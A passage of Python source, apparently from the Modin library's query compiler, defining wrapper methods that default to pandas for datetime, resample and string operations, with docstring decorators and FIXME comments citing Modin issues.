@doc_utils.doc_dt_timestamp(\n prop=\"day name\", refer_to=\"day_name\", params=\"locale : str, optional\"\n )\n def dt_day_name(self, locale=None):\n return DateTimeDefault.register(pandas.Series.dt.day_name)(self, locale)\n\n @doc_utils.doc_dt_timestamp(prop=\"integer day of week\", refer_to=\"dayofweek\")\n # FIXME: `dt_dayofweek` is an alias for `dt_weekday`, one of them should\n # be removed (Modin issue #3107).\n def dt_dayofweek(self):\n return DateTimeDefault.register(pandas.Series.dt.dayofweek)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"day of year\", refer_to=\"dayofyear\")\n def dt_dayofyear(self):\n return DateTimeDefault.register(pandas.Series.dt.dayofyear)(self)\n\n @doc_utils.doc_dt_interval(prop=\"days\", refer_to=\"days\")\n def dt_days(self):\n return DateTimeDefault.register(pandas.Series.dt.days)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"number of days in month\", refer_to=\"days_in_month\"\n )\n # FIXME: `dt_days_in_month` is an alias for `dt_daysinmonth`, one of them should\n # be removed (Modin issue #3107).\n def dt_days_in_month(self):\n return DateTimeDefault.register(pandas.Series.dt.days_in_month)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"number of days in month\", refer_to=\"daysinmonth\")\n def dt_daysinmonth(self):\n return DateTimeDefault.register(pandas.Series.dt.daysinmonth)(self)\n\n @doc_utils.doc_dt_period(prop=\"the timestamp of end time\", refer_to=\"end_time\")\n def dt_end_time(self):\n return DateTimeDefault.register(pandas.Series.dt.end_time)(self)\n\n @doc_utils.doc_dt_round(refer_to=\"floor\")\n def dt_floor(self, freq, ambiguous=\"raise\", nonexistent=\"raise\"):\n return DateTimeDefault.register(pandas.Series.dt.floor)(\n self, freq, ambiguous, nonexistent\n )\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.freq\")\n def dt_freq(self):\n \"\"\"\n Get the time frequency of the underlying time-series data.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing a single value, the frequency of the data.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.freq)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"hour\", refer_to=\"hour\")\n def dt_hour(self):\n return DateTimeDefault.register(pandas.Series.dt.hour)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether corresponding year is leap\",\n refer_to=\"is_leap_year\",\n )\n def dt_is_leap_year(self):\n return DateTimeDefault.register(pandas.Series.dt.is_leap_year)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the last day of the month\",\n refer_to=\"is_month_end\",\n )\n def dt_is_month_end(self):\n return DateTimeDefault.register(pandas.Series.dt.is_month_end)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the first day of the month\",\n refer_to=\"is_month_start\",\n )\n def dt_is_month_start(self):\n return DateTimeDefault.register(pandas.Series.dt.is_month_start)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the last day of the quarter\",\n refer_to=\"is_quarter_end\",\n )\n def dt_is_quarter_end(self):\n return DateTimeDefault.register(pandas.Series.dt.is_quarter_end)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the first day of the quarter\",\n refer_to=\"is_quarter_start\",\n )\n def dt_is_quarter_start(self):\n return DateTimeDefault.register(pandas.Series.dt.is_quarter_start)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the last day of the year\",\n refer_to=\"is_year_end\",\n )\n def dt_is_year_end(self):\n return DateTimeDefault.register(pandas.Series.dt.is_year_end)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the boolean of whether the date is the first day of the year\",\n refer_to=\"is_year_start\",\n )\n def dt_is_year_start(self):\n return DateTimeDefault.register(pandas.Series.dt.is_year_start)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"microseconds component\", refer_to=\"microsecond\")\n def dt_microsecond(self):\n return DateTimeDefault.register(pandas.Series.dt.microsecond)(self)\n\n @doc_utils.doc_dt_interval(prop=\"microseconds component\", refer_to=\"microseconds\")\n def dt_microseconds(self):\n return DateTimeDefault.register(pandas.Series.dt.microseconds)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"minute component\", refer_to=\"minute\")\n def dt_minute(self):\n return DateTimeDefault.register(pandas.Series.dt.minute)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"month component\", refer_to=\"month\")\n def dt_month(self):\n return DateTimeDefault.register(pandas.Series.dt.month)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the month name\", refer_to=\"month name\", params=\"locale : str, optional\"\n )\n def dt_month_name(self, locale=None):\n return DateTimeDefault.register(pandas.Series.dt.month_name)(self, locale)\n\n @doc_utils.doc_dt_timestamp(prop=\"nanoseconds component\", refer_to=\"nanosecond\")\n def dt_nanosecond(self):\n return DateTimeDefault.register(pandas.Series.dt.nanosecond)(self)\n\n @doc_utils.doc_dt_interval(prop=\"nanoseconds component\", refer_to=\"nanoseconds\")\n def dt_nanoseconds(self):\n return DateTimeDefault.register(pandas.Series.dt.nanoseconds)(self)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.normalize\")\n def dt_normalize(self):\n \"\"\"\n Set the time component of each date-time value to midnight.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing date-time values with midnight time.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.normalize)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"quarter component\", refer_to=\"quarter\")\n def dt_quarter(self):\n return DateTimeDefault.register(pandas.Series.dt.quarter)(self)\n\n @doc_utils.doc_dt_period(prop=\"the fiscal year\", refer_to=\"qyear\")\n def dt_qyear(self):\n return DateTimeDefault.register(pandas.Series.dt.qyear)(self)\n\n @doc_utils.doc_dt_round(refer_to=\"round\")\n def dt_round(self, freq, ambiguous=\"raise\", nonexistent=\"raise\"):\n return DateTimeDefault.register(pandas.Series.dt.round)(\n self, freq, ambiguous, nonexistent\n )\n\n @doc_utils.doc_dt_timestamp(prop=\"seconds component\", refer_to=\"second\")\n def dt_second(self):\n return DateTimeDefault.register(pandas.Series.dt.second)(self)\n\n @doc_utils.doc_dt_interval(prop=\"seconds component\", refer_to=\"seconds\")\n def dt_seconds(self):\n return DateTimeDefault.register(pandas.Series.dt.seconds)(self)\n\n @doc_utils.doc_dt_period(prop=\"the timestamp of start time\", refer_to=\"start_time\")\n def dt_start_time(self):\n return DateTimeDefault.register(pandas.Series.dt.start_time)(self)\n\n @doc_utils.add_refer_to(\"Series.dt.strftime\")\n def dt_strftime(self, date_format):\n \"\"\"\n Format underlying date-time data using specified format.\n\n Parameters\n ----------\n date_format : str\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing formated date-time values.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.strftime)(self, date_format)\n\n @doc_utils.doc_dt_timestamp(prop=\"time component\", refer_to=\"time\")\n def dt_time(self):\n return DateTimeDefault.register(pandas.Series.dt.time)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"time component with timezone information\", refer_to=\"timetz\"\n )\n def dt_timetz(self):\n return DateTimeDefault.register(pandas.Series.dt.timetz)(self)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.to_period\")\n def dt_to_period(self, freq=None):\n \"\"\"\n Convert underlying data to the period at a particular frequency.\n\n Parameters\n ----------\n freq : str, optional\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing period data.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.to_period)(self, freq)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.to_pydatetime\")\n def dt_to_pydatetime(self):\n \"\"\"\n Convert underlying data to array of python native ``datetime``.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing 1D array of ``datetime`` objects.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.to_pydatetime)(self)\n\n # FIXME: there are no references to this method, we should either remove it\n # or add a call reference at the DataFrame level (Modin issue #3103).\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.to_pytimedelta\")\n def dt_to_pytimedelta(self):\n \"\"\"\n Convert underlying data to array of python native ``datetime.timedelta``.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing 1D array of ``datetime.timedelta``.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.to_pytimedelta)(self)\n\n @doc_utils.doc_dt_period(\n prop=\"the timestamp representation\", refer_to=\"to_timestamp\"\n )\n def dt_to_timestamp(self):\n return DateTimeDefault.register(pandas.Series.dt.to_timestamp)(self)\n\n @doc_utils.doc_dt_interval(prop=\"duration in seconds\", refer_to=\"total_seconds\")\n def dt_total_seconds(self):\n return DateTimeDefault.register(pandas.Series.dt.total_seconds)(self)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.tz\")\n def dt_tz(self):\n \"\"\"\n Get the time-zone of the underlying time-series data.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing a single value, time-zone of the data.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.tz)(self)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.tz_convert\")\n def dt_tz_convert(self, tz):\n \"\"\"\n Convert time-series data to the specified time zone.\n\n Parameters\n ----------\n tz : str, pytz.timezone\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing values with converted time zone.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.tz_convert)(self, tz)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.tz_localize\")\n def dt_tz_localize(self, tz, ambiguous=\"raise\", nonexistent=\"raise\"):\n \"\"\"\n Localize tz-naive to tz-aware.\n\n Parameters\n ----------\n tz : str, pytz.timezone, optional\n ambiguous : {\"raise\", \"inner\", \"NaT\"} or bool mask, default: \"raise\"\n nonexistent : {\"raise\", \"shift_forward\", \"shift_backward, \"NaT\"} or pandas.timedelta, default: \"raise\"\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing values with localized time zone.\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.tz_localize)(\n self, tz, ambiguous, nonexistent\n )\n\n @doc_utils.doc_dt_timestamp(prop=\"week component\", refer_to=\"week\")\n def dt_week(self):\n return DateTimeDefault.register(pandas.Series.dt.week)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"integer day of week\", refer_to=\"weekday\")\n def dt_weekday(self):\n return DateTimeDefault.register(pandas.Series.dt.weekday)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"week of year\", refer_to=\"weekofyear\")\n def dt_weekofyear(self):\n return DateTimeDefault.register(pandas.Series.dt.weekofyear)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"year component\", refer_to=\"year\")\n def dt_year(self):\n return DateTimeDefault.register(pandas.Series.dt.year)(self)\n\n # End of DateTime methods\n\n # Resample methods\n\n # FIXME:\n # 1. Backend shouldn't care about differences between Series and DataFrame\n # so `resample_agg_df` and `resample_agg_ser` should be combined (Modin issue #3104).\n # 2. In DataFrame API `Resampler.aggregate` is an alias for `Resampler.apply`\n # we should remove one of these methods: `resample_agg_*` or `resample_app_*` (Modin issue #3107).\n @doc_utils.doc_resample_agg(\n action=\"apply passed aggregation function\",\n params=\"func : str, dict, callable(pandas.Series) -> scalar, or list of such\",\n output=\"function names\",\n refer_to=\"agg\",\n )\n def resample_agg_df(self, resample_args, func, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.aggregate)(\n self, resample_args, func, *args, **kwargs\n )\n\n @doc_utils.add_deprecation_warning(replacement_method=\"resample_agg_df\")\n @doc_utils.doc_resample_agg(\n action=\"apply passed aggregation function in a one-column query compiler\",\n params=\"func : str, dict, callable(pandas.Series) -> scalar, or list of such\",\n output=\"function names\",\n refer_to=\"agg\",\n )\n def resample_agg_ser(self, resample_args, func, *args, **kwargs):\n return ResampleDefault.register(\n pandas.core.resample.Resampler.aggregate, squeeze_self=True\n )(self, resample_args, func, *args, **kwargs)\n\n @doc_utils.add_deprecation_warning(replacement_method=\"resample_agg_df\")\n @doc_utils.doc_resample_agg(\n action=\"apply passed aggregation function\",\n params=\"func : str, dict, callable(pandas.Series) -> scalar, or list of such\",\n output=\"function names\",\n refer_to=\"apply\",\n )\n def resample_app_df(self, resample_args, func, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.apply)(\n self, resample_args, func, *args, **kwargs\n )\n\n @doc_utils.add_deprecation_warning(replacement_method=\"resample_agg_df\")\n @doc_utils.doc_resample_agg(\n action=\"apply passed aggregation function in a one-column query compiler\",\n params=\"func : str, dict, callable(pandas.Series) -> scalar, or list of such\",\n output=\"function names\",\n refer_to=\"apply\",\n )\n def resample_app_ser(self, resample_args, func, *args, **kwargs):\n return ResampleDefault.register(\n pandas.core.resample.Resampler.apply, squeeze_self=True\n )(self, resample_args, func, *args, **kwargs)\n\n def resample_asfreq(self, resample_args, fill_value):\n \"\"\"\n Resample time-series data and get the values at the new frequency.\n\n Group data into intervals by time-series row/column with\n a specified frequency and get values at the new frequency.\n\n Parameters\n ----------\n resample_args : list\n Resample parameters as expected by ``modin.pandas.DataFrame.resample`` signature.\n fill_value : scalar\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing values at the specified frequency.\n \"\"\"\n return ResampleDefault.register(pandas.core.resample.Resampler.asfreq)(\n self, resample_args, fill_value\n )\n\n # FIXME: `resample_backfill` is an alias for `resample_bfill`, one of these method\n # should be removed (Modin issue #3107).\n @doc_utils.doc_resample_fillna(method=\"back-fill\", refer_to=\"backfill\")\n def resample_backfill(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.backfill)(\n self, resample_args, limit\n )\n\n @doc_utils.doc_resample_fillna(method=\"back-fill\", refer_to=\"bfill\")\n def resample_bfill(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.bfill)(\n self, resample_args, limit\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"number of non-NA values\", refer_to=\"count\", compatibility_params=False\n )\n def resample_count(self, resample_args):\n return ResampleDefault.register(pandas.core.resample.Resampler.count)(\n self, resample_args\n )\n\n # FIXME: `resample_ffill` is an alias for `resample_pad`, one of these method\n # should be removed (Modin issue #3107).\n @doc_utils.doc_resample_fillna(method=\"forward-fill\", refer_to=\"ffill\")\n def resample_ffill(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.ffill)(\n self, resample_args, limit\n )\n\n # FIXME: we should combine all resample fillna methods into `resample_fillna`\n # (Modin issue #3107)\n @doc_utils.doc_resample_fillna(\n method=\"specified\", refer_to=\"fillna\", params=\"method : str\"\n )\n def resample_fillna(self, resample_args, method, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.fillna)(\n self, resample_args, method, limit\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"first element\", refer_to=\"first\", params=\"_method : str\"\n )\n def resample_first(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.first)(\n self, resample_args, _method, *args, **kwargs\n )\n\n # FIXME: This function takes Modin DataFrame via `obj` parameter,\n # we should avoid leaking of the high-level objects to the query compiler level.\n # (Modin issue #3106)\n def resample_get_group(self, resample_args, name, obj):\n \"\"\"\n Resample time-series data and get the specified group.\n\n Group data into intervals by time-series row/column with\n a specified frequency and get the values of the specified group.\n\n Parameters\n ----------\n resample_args : list\n Resample parameters as expected by ``modin.pandas.DataFrame.resample`` signature.\n name : object\n obj : modin.pandas.DataFrame, optional\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the values from the specified group.\n \"\"\"\n return ResampleDefault.register(pandas.core.resample.Resampler.get_group)(\n self, resample_args, name, obj\n )\n\n @doc_utils.doc_resample_fillna(\n method=\"specified interpolation\",\n refer_to=\"interpolate\",\n params=\"\"\"\n method : str\n axis : {0, 1}\n limit : int\n inplace : {False}\n This parameter serves the compatibility purpose. Always has to be False.\n limit_direction : {\"forward\", \"backward\", \"both\"}\n limit_area : {None, \"inside\", \"outside\"}\n downcast : str, optional\n **kwargs : dict\n \"\"\",\n overwrite_template_params=True,\n )\n def resample_interpolate(\n self,\n resample_args,\n method,\n axis,\n limit,\n inplace,\n limit_direction,\n limit_area,\n downcast,\n **kwargs,\n ):\n return ResampleDefault.register(pandas.core.resample.Resampler.interpolate)(\n self,\n resample_args,\n method,\n axis,\n limit,\n inplace,\n limit_direction,\n limit_area,\n downcast,\n **kwargs,\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"last element\", params=\"_method : str\", refer_to=\"last\"\n )\n def resample_last(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.last)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"maximum value\", params=\"_method : str\", refer_to=\"max\"\n )\n def resample_max(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.max)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"mean value\", params=\"_method : str\", refer_to=\"mean\"\n )\n def resample_mean(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.mean)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"median value\", params=\"_method : str\", refer_to=\"median\"\n )\n def resample_median(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.median)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"minimum value\", params=\"_method : str\", refer_to=\"min\"\n )\n def resample_min(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.min)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_fillna(method=\"'nearest'\", refer_to=\"nearest\")\n def resample_nearest(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.nearest)(\n self, resample_args, limit\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"number of unique values\", params=\"_method : str\", refer_to=\"nunique\"\n )\n def resample_nunique(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.nunique)(\n self, resample_args, _method, *args, **kwargs\n )\n\n # FIXME: Backend shouldn't care about differences between Series and DataFrame\n # so `resample_ohlc_df` and `resample_ohlc_ser` should be combined (Modin issue #3104).\n @doc_utils.doc_resample_agg(\n action=\"compute open, high, low and close values\",\n params=\"_method : str\",\n output=\"labels of columns containing computed values\",\n refer_to=\"ohlc\",\n )\n def resample_ohlc_df(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.ohlc)(\n self, resample_args, _method, *args, **kwargs\n )\n\n @doc_utils.doc_resample_agg(\n action=\"compute open, high, low and close values\",\n params=\"_method : str\",\n output=\"labels of columns containing computed values\",\n refer_to=\"ohlc\",\n )\n def resample_ohlc_ser(self, resample_args, _method, *args, **kwargs):\n return ResampleDefault.register(\n pandas.core.resample.Resampler.ohlc, squeeze_self=True\n )(self, resample_args, _method, *args, **kwargs)\n\n @doc_utils.doc_resample_fillna(method=\"'pad'\", refer_to=\"pad\")\n def resample_pad(self, resample_args, limit):\n return ResampleDefault.register(pandas.core.resample.Resampler.pad)(\n self, resample_args, limit\n )\n\n # FIXME: This method require us to build high-level resampler object\n # which we shouldn't do at the backend. We need to move this at the front.\n # (Modin issue #3105)\n @doc_utils.add_refer_to(\"Resampler.pipe\")\n def resample_pipe(self, resample_args, func, *args, **kwargs):\n \"\"\"\n Resample time-series data and apply aggregation on it.\n\n Group data into intervals by time-series row/column with\n a specified frequency, build equivalent ``pandas.Resampler`` object\n and apply passed function to it.\n\n Parameters\n ----------\n resample_args : list\n Resample parameters as expected by ``modin.pandas.DataFrame.resample`` signature.\n func : callable(pandas.Resampler) -> object or tuple(callable, str)\n *args : iterable\n Positional arguments to pass to function.\n **kwargs : dict\n Keyword arguments to pass to function.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the result of passed function.\n \"\"\"\n return ResampleDefault.register(pandas.core.resample.Resampler.pipe)(\n self, resample_args, func, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"product\",\n params=\"\"\"\n _method : str\n min_count : int\"\"\",\n refer_to=\"prod\",\n )\n def resample_prod(self, resample_args, _method, min_count, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.prod)(\n self, resample_args, _method, min_count, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"quantile\", params=\"q : float\", refer_to=\"quantile\"\n )\n def resample_quantile(self, resample_args, q, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.quantile)(\n self, resample_args, q, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"standart error of the mean\",\n params=\"ddof : int, default: 1\",\n refer_to=\"sem\",\n )\n def resample_sem(self, resample_args, ddof=1, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.sem)(\n self, resample_args, ddof, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"number of elements in a group\", refer_to=\"size\"\n )\n def resample_size(self, resample_args, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.size)(\n self, resample_args, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"standart deviation\", params=\"ddof : int\", refer_to=\"std\"\n )\n def resample_std(self, resample_args, ddof, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.std)(\n self, resample_args, ddof, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"sum\",\n params=\"\"\"\n _method : str\n min_count : int\"\"\",\n refer_to=\"sum\",\n )\n def resample_sum(self, resample_args, _method, min_count, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.sum)(\n self, resample_args, _method, min_count, *args, **kwargs\n )\n\n def resample_transform(self, resample_args, arg, *args, **kwargs):\n \"\"\"\n Resample time-series data and apply aggregation on it.\n\n Group data into intervals by time-series row/column with\n a specified frequency and call passed function on each group.\n In contrast to ``resample_app_df`` apply function to the whole group,\n instead of a single axis.\n\n Parameters\n ----------\n resample_args : list\n Resample parameters as expected by ``modin.pandas.DataFrame.resample`` signature.\n arg : callable(pandas.DataFrame) -> pandas.Series\n *args : iterable\n Positional arguments to pass to function.\n **kwargs : dict\n Keyword arguments to pass to function.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the result of passed function.\n \"\"\"\n return ResampleDefault.register(pandas.core.resample.Resampler.transform)(\n self, resample_args, arg, *args, **kwargs\n )\n\n @doc_utils.doc_resample_reduction(\n result=\"variance\", params=\"ddof : int\", refer_to=\"var\"\n )\n def resample_var(self, resample_args, ddof, *args, **kwargs):\n return ResampleDefault.register(pandas.core.resample.Resampler.var)(\n self, resample_args, ddof, *args, **kwargs\n )\n\n # End of Resample methods\n\n # Str methods\n\n @doc_utils.doc_str_method(refer_to=\"capitalize\", params=\"\")\n def str_capitalize(self):\n return StrDefault.register(pandas.Series.str.capitalize)(self)\n\n @doc_utils.doc_str_method(\n refer_to=\"center\",\n params=\"\"\"\n width : int\n fillchar : str, default: ' '\"\"\",\n )\n def str_center(self, width, fillchar=\" \"):\n return StrDefault.register(pandas.Series.str.center)(self, width, fillchar)\n\n @doc_utils.doc_str_method(\n refer_to=\"contains\",\n params=\"\"\"\n pat : str\n case : bool, default: True\n flags : int, default: 0\n na : object, default: np.NaN\n regex : bool, default: True\"\"\",\n )\n def str_contains(self, pat, case=True, flags=0, na=np.NaN, regex=True):\n return StrDefault.register(pandas.Series.str.contains)(\n self, pat, case, flags, na, regex\n )\n\n @doc_utils.doc_str_method(\n refer_to=\"count\",\n params=\"\"\"\n pat : str\n flags : int, default: 0\n **kwargs : dict\"\"\",\n )\n def str_count(self, pat, flags=0, **kwargs):\n return StrDefault.register(pandas.Series.str.count)(self, pat, flags, **kwargs)\n\n @doc_utils.doc_str_method(\n refer_to=\"endswith\",\n params=\"\"\"\n pat : str\n na : object, default: np.NaN\"\"\",\n )\n def str_endswith(self, pat, na=np.NaN):\n return StrDefault.register(pandas.Series.str.endswith)(self, pat, na)\n\n @doc_utils.doc_str_method(\n refer_to=\"find\",\n params=\"\"\"\n sub : str\n start : int, default: 0\n end : int, optional\"\"\",\n )\n def str_find(self, sub, start=0, end=None):\n return StrDefault.register(pandas.Series.str.find)(self, sub, start, end)\n\n @doc_utils.doc_str_method(\n refer_to=\"findall\",\n params=\"\"\"\n pat : str\n flags : int, default: 0\n **kwargs : dict\"\"\",\n )\n def str_findall(self, pat, flags=0, **kwargs):\n return StrDefault.register(pandas.Series.str.findall)(\n self, pat, flags, **kwargs\n )\n\n @doc_utils.doc_str_method(refer_to=\"get\", params=\"i : int\")\n def str_get(self, i):\n return StrDefault.register(pandas.Series.str.get)(self, i)\n\n @doc_utils.doc_str_method(\n refer_to=\"index\",\n params=\"\"\"\n sub : str\n start : int, default: 0\n end : int, optional\"\"\",\n )\n def str_index(self, sub, start=0, end=None):\n return StrDefault.register(pandas.Series.str.index)(self, sub, start, end)\n\n @doc_utils.doc_str_method(refer_to=\"isalnum\", params=\"\")\n def str_isalnum(self):\n return StrDefault.register(pandas.Series.str.isalnum)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isalpha\", params=\"\")\n def str_isalpha(self):\n return StrDefault.register(pandas.Series.str.isalpha)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isdecimal\", params=\"\")\n def str_isdecimal(self):\n return StrDefault.register(pandas.Series.str.isdecimal)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isdigit\", params=\"\")\n def str_isdigit(self):\n return StrDefault.register(pandas.Series.str.isdigit)(self)\n\n @doc_utils.doc_str_method(refer_to=\"islower\", params=\"\")\n def str_islower(self):\n return StrDefault.register(pandas.Series.str.islower)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isnumeric\", params=\"\")\n def str_isnumeric(self):\n return StrDefault.register(pandas.Series.str.isnumeric)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isspace\", params=\"\")\n def str_isspace(self):\n return StrDefault.register(pandas.Series.str.isspace)(self)\n\n @doc_utils.doc_str_method(refer_to=\"istitle\", params=\"\")\n def str_istitle(self):\n return StrDefault.register(pandas.Series.str.istitle)(self)\n\n @doc_utils.doc_str_method(refer_to=\"isupper\", params=\"\")\n def str_isupper(self):\n return StrDefault.register(pandas.Series.str.isupper)(self)\n\n @doc_utils.doc_str_method(refer_to=\"join\", params=\"sep : str\")\n def str_join(self, sep):\n return StrDefault.register(pandas.Series.str.join)(self, sep)\n\n @doc_utils.doc_str_method(refer_to=\"len\", params=\"\")\n def str_len(self):\n return StrDefault.register(pandas.Series.str.len)(self)\n\n @doc_utils.doc_str_method(\n refer_to=\"ljust\",\n params=\"\"\"\n width : int\n fillchar : str, default: ' '\"\"\",\n )\n def str_ljust(self, width, fillchar=\" \"):\n return StrDefault.register(pandas.Series.str.ljust)(self, width, fillchar)\n\n @doc_utils.doc_str_method(refer_to=\"lower\", params=\"\")\n def str_lower(self):\n return StrDefault.register(pandas.Series.str.lower)(self)\n\n @doc_utils.doc_str_method(refer_to=\"lstrip\", params=\"to_strip : str, optional\")\n def str_lstrip(self, to_strip=None):\n return StrDefault.register(pandas.Series.str.lstrip)(self, to_strip)\n\n @doc_utils.doc_str_method(\n refer_to=\"match\",\n params=\"\"\"\n pat : str\n case : bool, default: True\n flags : int, default: 0\n na : object, default: np.NaN\"\"\",\n )\n def str_match(self, pat, case=True, flags=0, na=np.NaN):\n return StrDefault.register(pandas.Series.str.match)(self, pat, case, flags, na)\n\n @doc_utils.doc_str_method(\n refer_to=\"normalize\", params=\"form : {'NFC', 'NFKC', 'NFD', 'NFKD'}\"\n )\n def str_normalize(self, form):\n return StrDefault.register(pandas.Series.str.normalize)(self, form)\n\n @doc_utils.doc_str_method(\n refer_to=\"pad\",\n params=\"\"\"\n width : int\n side : {'left', 'right', 'both'}, default: 'left'\n fillchar : str, default: ' '\"\"\",\n )\n def str_pad(self, width, side=\"left\", fillchar=\" \"):\n return StrDefault.register(pandas.Series.str.pad)(self, width, side, fillchar)\n\n @doc_utils.doc_str_method(\n refer_to=\"partition\",\n params=\"\"\"\n sep : str, default: ' '\n expand : bool, default: True\"\"\",\n )\n def str_partition(self, sep=\" \", expand=True):\n return StrDefault.register(pandas.Series.str.partition)(self, sep, expand)\n\n @doc_utils.doc_str_method(refer_to=\"repeat\", params=\"repeats : int\")\n def str_repeat(self, repeats):\n return StrDefault.register(pandas.Series.str.repeat)(self, repeats)\n\n @doc_utils.doc_str_method(\n refer_to=\"replace\",\n params=\"\"\"\n pat : str\n repl : str or callable\n n : int, default: -1\n case : bool, optional\n flags : int, default: 0\n regex : bool, default: True\"\"\",\n )\n def str_replace(self, pat, repl, n=-1, case=None, flags=0, regex=True):\n return StrDefault.register(pandas.Series.str.replace)(\n self, pat, repl, n, case, flags, regex\n )\n\n @doc_utils.doc_str_method(\n refer_to=\"rfind\",\n params=\"\"\"\n sub : str\n start : int, default: 0\n end : int, optional\"\"\",\n )\n def str_rfind(self, sub, start=0, end=None):\n return StrDefault.register(pandas.Series.str.rfind)(self, sub, start, end)\n\n @doc_utils.doc_str_method(\n refer_to=\"rindex\",\n params=\"\"\"\n sub : str\n start : int, default: 0\n end : int, optional\"\"\",\n )\n def 